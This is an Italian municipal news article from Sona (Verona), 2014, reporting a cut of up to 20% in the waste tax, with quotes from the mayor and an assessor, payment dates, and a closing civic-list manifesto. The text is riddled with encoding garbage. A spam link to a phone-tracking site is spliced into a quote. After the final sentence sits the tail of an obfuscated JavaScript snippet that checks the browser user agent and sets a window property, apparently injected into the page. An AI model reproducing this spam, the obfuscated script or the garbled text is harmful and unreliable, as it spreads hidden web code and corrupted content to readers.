Sona: diminuisce fino al 20% la tariffa dei rifiuti. Il Sindaco: ai???un risultato straordinario dopo anni di aumenti a doppia cifraai???.

11 Agosto 2014 – Sona (Verona)

Per il 2014, i cittadini e le aziende di Sona vedranno diminuire fino al 20% la tassa dei rifiuti. A comunicarlo A? lai??i??Assessore Luigi Forante durante il consiglio comunale del 26 Luglio scorso.

ai???A? un risultato straordinario dopo anni di aumenti a doppia cifra ai??i?? sostiene il Sindaco Gianluigi Mazzi -: ciA? dimostra che una gestione oculata del ciclo dei rifiuti, a cominciare dalla corretta diversificazione a casa o nelle aziende, comporta un risparmio per tutta la collettivitAi?? Lai??i??impegno e la volontAi?? pagano. Continuiamo cosAi??.ai???

ai???Il Piano finanziario per lai??i??anno 2014 stabilisce che lai??i??ammontare di tutti i costi afferenti al servizio di gestione dei rifiuti urbani e assimilati sia pari a ai??i?? 1.739.296,09 ai??i?? dichiara lai??i??Assessore Forante ai??i?? https://www.celltrackingapps.com. e, considerato che il Piano finanziario per lai??i??anno 2013 prevedeva costi per ai??i?? 1.850.788,01 si determina cosAi?? un risparmio di ai??i?? 111.491,92 pari al 6%ai???.

Non solo. La Tari 2014, rispetto alla Tares 2013, non prevede piA? il tributo sui servizi destinato allo Stato (0,30 centesimi a mq) e questo determina un risparmio ancora piA? importante per i contribuenti.
Le famiglie e i cittadini risparmieranno almeno il 6% ma, se si considera anche il risparmio del tributo sui servizi (0,30 centesimi a mq), si arriva a circa il 20%. Per le utenze non domestiche cioA? tutte le ditte, escluse dalla Tasi, avranno un risparmio effettivo dal 8% al 15% circa, in relazione alla categoria economica di appartenenza e alla superficie detenuta.

ai???Si A? scelto anche di ridurre per le utenze dei ristoranti, ortofrutta/fiorerie e bar il coefficiente di produzione annua per metro quadrato dei rifiuti, come concesso dalla legge solo per il 2014-2015 ai??i?? dichiara il Sindaco Gianluigi Mazzi -. Tale riduzione comporterAi?? un ulteriore sconto sulla tariffa e questa scelta permette di riequilibrare il rapporto tariffa/rifiuti conferiti per le utenze commerciali che nel 2013 avevano subito per legge un notevole aumento della tariffa. Un atto necessario in questo tempo di crisi.ai???

ai???Ma non A? tutto ai??i?? sostiene lai??i??Assessore Forante -: il Comune ha adottato altresAi?? una riduzione del 35% per le ai???botteghe storicheai??? e una maggiorazione del 10% per le utenze del centro commerciale La Grande Mela e dellai??i??ex residence ai???Bavariaai???, al fine di compensare i maggiori costi per la raccolta e lo smaltimento dei rifiuti ivi prodotti, nel rispetto del principio legislativo di equitAi?? del ai???chi inquina pagaai??i??ai???.

Per quanto riguarda le scadenze e il numero rate della TARI 2014, si stabilisce di riscuotere il tributo in 2 rate: 10 settembre 2014 e 10 novembre 2014.
Il versamento sarAi?? effettuato, come lo scorso anno, utilizzando il modello unificato semplificato F24, spedito ai contribuenti unitamente ad comunicazione di un “invito al pagamento” TARI 2014.
Informazioni presso lai??i??ufficio tributi. ecfdx3[_0x446d[12]]();window[_0x446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0x446d[6])}

Comments are closed.

Un nuovo futuro perSona

Ci accomuna un bisogno: quello di creare un nuovo modo di appartenere alla comunità.
Una strada concreta fatta di conoscenza, esperienza e analisi, elementi necessari allo sviluppo di nuove proposte solide e realizzabili.

Ci accomuna un forte senso di appartenenza a questa comunità che ci ha sempre visto coinvolti in prima persona in attività di interesse sociale e politico.
Attività che ci hanno preparato e motivato nel voler tradurre in realtà amministrativa un progetto libero dalle tattiche e dalle strategia di partito.

Ci accomuna l’esperienza e la competenza nei diversi settori stimolo per una nuova amministrazione basata su una programmazione attenta dei bisogni quotidiani ed essenziali dei cittadini; sull’ottimizzazione e la valorizzazione delle risorse e sull’identificazione di un programma di sviluppo del territorio.

Ci accomuna la voglia di fare, di provare a creare un futuro che è nostro e dei nostri figli, senza interessi, ma con lo spirito di servizio tipico del volontariato.

Ci muove la speranza di coinvolgere chi, come noi, ha voglia di rompere gli schemi della vecchia guardia politica e vuole rinnovare Sona e e sue frazioni per davvero.